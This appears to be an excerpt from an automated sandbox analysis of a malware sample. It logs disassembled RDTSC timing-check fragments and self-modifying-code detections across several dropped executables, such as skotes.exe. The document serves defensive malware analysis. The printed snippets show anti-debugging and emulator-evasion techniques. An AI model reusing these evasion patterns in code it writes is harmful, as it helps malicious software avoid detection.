Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 13214AA second address: 119FBEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 add dword ptr [esp], 286912BEh 0x0000000f sub edi, 7BBBB0A3h 0x00000015 push dword ptr [ebp+122D0301h] 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007F5FF4AFEFF8h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 call dword ptr [ebp+122D2767h] 0x0000003b pushad 0x0000003c stc 0x0000003d xor eax, eax 0x0000003f stc 0x00000040 mov edx, dword ptr [esp+28h] 0x00000044 cld 0x00000045 mov dword ptr [ebp+122D2CE2h], eax 0x0000004b stc 0x0000004c mov esi, 0000003Ch 0x00000051 jmp 00007F5FF4AFF005h 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a jns 00007F5FF4AFEFF7h 0x00000060 js 00007F5FF4AFEFFCh 0x00000066 xor dword ptr [ebp+122D196Bh], ebx 0x0000006c lodsw 0x0000006e jno 00007F5FF4AFEFF7h 0x00000074 add eax, dword ptr [esp+24h] 0x00000078 jmp 00007F5FF4AFEFFFh 0x0000007d mov ebx, dword ptr [esp+24h] 0x00000081 jmp 00007F5FF4AFEFFAh 0x00000086 push eax 0x00000087 jp 00007F5FF4AFF00Ch 0x0000008d push eax 0x0000008e push edx 0x0000008f pushad 0x00000090 popad 0x00000091 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1321504 second address: 1321508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1321508 second address: 132150E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 132150E second address: 1321512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1321512 second address: 132153B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFF006h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f ja 00007F5FF4AFEFF6h 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 132153B second address: 13215ED instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5FF4F12448h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sub dword ptr [ebp+122D1C16h], edx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F5FF4F12448h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D35DEh], ebx 0x00000033 push 25413413h 0x00000038 jmp 00007F5FF4F12459h 0x0000003d xor dword ptr [esp], 25413493h 0x00000044 mov dword ptr [ebp+122D1AC6h], eax 0x0000004a push 00000003h 0x0000004c jmp 00007F5FF4F12454h 0x00000051 mov ch, 11h 0x00000053 push 00000000h 0x00000055 jng 00007F5FF4F1244Ch 0x0000005b mov dword ptr [ebp+122D1C25h], edi 0x00000061 push ebx 0x00000062 pop edi 0x00000063 push 00000003h 0x00000065 jnc 00007F5FF4F12452h 0x0000006b push 843832F0h 0x00000070 jo 00007F5FF4F12454h 0x00000076 push eax 0x00000077 push edx 0x00000078 push esi 0x00000079 pop esi 0x0000007a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1321662 second address: 1321667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1321870 second address: 1321888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jbe 00007F5FF4F12452h 0x00000010 jng 00007F5FF4F1244Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1321888 second address: 1321896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [eax] 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1321896 second address: 13218C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F5FF4F12454h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 jmp 00007F5FF4F1244Ch 0x00000015 je 00007F5FF4F1244Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 13218C9 second address: 1321918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov ecx, dword ptr [ebp+122D2B7Eh] 0x0000000c push 00000003h 0x0000000e mov si, 4F88h 0x00000012 push 00000000h 0x00000014 call 00007F5FF4AFF002h 0x00000019 mov ecx, dword ptr [ebp+122D29DEh] 0x0000001f pop edx 0x00000020 push 00000003h 0x00000022 jl 00007F5FF4AFEFF8h 0x00000028 mov cl, 31h 0x0000002a call 00007F5FF4AFEFF9h 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F5FF4AFEFFCh 0x00000037 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1321918 second address: 132194D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F1244Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F5FF4F12452h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 je 00007F5FF4F12446h 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 132194D second address: 1321953 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1321953 second address: 1321995 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F12457h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push edx 0x0000000c jmp 00007F5FF4F12455h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 js 00007F5FF4F12450h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1321995 second address: 13219BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov edx, dword ptr [ebp+122D2B12h] 0x0000000d lea ebx, dword ptr [ebp+124553E8h] 0x00000013 mov edx, dword ptr [ebp+122D2C52h] 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jnp 00007F5FF4AFEFFCh 0x00000022 jnc 00007F5FF4AFEFF6h 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 13219BD second address: 13219C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 13219C3 second address: 13219C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 13403FE second address: 134040D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F5FF4F12446h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 134040D second address: 1340411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 13405AF second address: 13405C8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5FF4F1244Ch 0x00000008 jne 00007F5FF4F12446h 0x0000000e pushad 0x0000000f jc 00007F5FF4F12446h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1340875 second address: 1340887 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFEFFDh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1340C95 second address: 1340CBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F1244Bh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F5FF4F12459h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1340CBF second address: 1340CC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1336C7B second address: 1336C80 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 130A139 second address: 130A13D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1341742 second address: 1341747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1341747 second address: 134175B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FF4AFF000h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 134175B second address: 134175F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 134175F second address: 1341775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5FF4AFEFF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F5FF4AFEFFEh 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 13454B8 second address: 13454D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5FF4F12458h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 13454D5 second address: 13454F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F5FF4AFF001h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 13454F3 second address: 13454F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1346D8E second address: 1346D9C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1346D9C second address: 1346DC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F5FF4F12446h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5FF4F12452h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1346DC2 second address: 1346DCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F5FF4AFEFF6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1346DCC second address: 1346DEB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5FF4F12446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f push eax 0x00000010 jl 00007F5FF4F12446h 0x00000016 pop eax 0x00000017 jo 00007F5FF4F1244Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 13480EF second address: 13480FC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5FF4AFEFF8h 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 134C82D second address: 134C856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5FF4F1244Bh 0x0000000b popad 0x0000000c jmp 00007F5FF4F12454h 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 134C856 second address: 134C85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1336C64 second address: 1336C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F5FF4F12446h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 134C99B second address: 134C9B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F5FF4AFEFFAh 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d ja 00007F5FF4AFF00Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 134CB35 second address: 134CB3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 134CB3B second address: 134CB6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFF001h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F5FF4AFF004h 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 134CF61 second address: 134CF89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FF4F12452h 0x00000009 jns 00007F5FF4F12448h 0x0000000f pop edi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007F5FF4F12446h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 13508DB second address: 13508E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F5FF4AFEFF6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 13508E5 second address: 135090D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F1244Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F5FF4F1244Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 135095C second address: 1350963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1350963 second address: 13509B4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 43075DA3h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F5FF4F12448h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov di, 14CBh 0x0000002d jnp 00007F5FF4F1244Ch 0x00000033 mov esi, dword ptr [ebp+122D2D22h] 0x00000039 push 0AC20E9Ch 0x0000003e pushad 0x0000003f push ebx 0x00000040 push edi 0x00000041 pop edi 0x00000042 pop ebx 0x00000043 jnp 00007F5FF4F1244Ch 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1350B2B second address: 1350B2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1350E6E second address: 1350E78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F5FF4F12446h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1350F53 second address: 1350F5D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5FF4AFEFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1350F5D second address: 1350F63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 1350F63 second address: 1350F86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5FF4AFF007h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 13516FB second address: 1351729 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F12456h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F5FF4F1244Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\random.exe	Special instruction interceptor: First address: 80DB31 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random.exe	Special instruction interceptor: First address: 80DBE7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random.exe	Special instruction interceptor: First address: 80DB37 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random.exe	Special instruction interceptor: First address: A3F5C0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Special instruction interceptor: First address: 119FC0E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Special instruction interceptor: First address: 13D46C7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Special instruction interceptor: First address: D2EC44 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Special instruction interceptor: First address: D2ED0A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Special instruction interceptor: First address: ED4A3E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Special instruction interceptor: First address: D2C4D6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Special instruction interceptor: First address: F66429 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 7EEC44 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 7EED0A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 994A3E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 7EC4D6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: A26429 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Special instruction interceptor: First address: 1165D69 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Special instruction interceptor: First address: 1342B30 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Special instruction interceptor: First address: 13A167B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Special instruction interceptor: First address: A8EDDD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Special instruction interceptor: First address: C55740 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Special instruction interceptor: First address: CBD43F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Special instruction interceptor: First address: 76193E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Special instruction interceptor: First address: 90825C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Special instruction interceptor: First address: 914A58 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Special instruction interceptor: First address: 99B5AD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Special instruction interceptor: First address: 26D919 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Special instruction interceptor: First address: 26B4BA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Special instruction interceptor: First address: 43562E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Special instruction interceptor: First address: 41B38B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Special instruction interceptor: First address: 497B98 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Special instruction interceptor: First address: 109FC0E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Special instruction interceptor: First address: 12D46C7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe	Special instruction interceptor: First address: 448920 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe	Special instruction interceptor: First address: 448838 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe	Special instruction interceptor: First address: 5F3360 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe	Special instruction interceptor: First address: 617EA0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE	Special instruction interceptor: First address: FEC44 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE	Special instruction interceptor: First address: FED0A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE	Special instruction interceptor: First address: 2A4A3E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE	Special instruction interceptor: First address: FC4D6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE	Special instruction interceptor: First address: 336429 instructions caused by: Self-modifying code
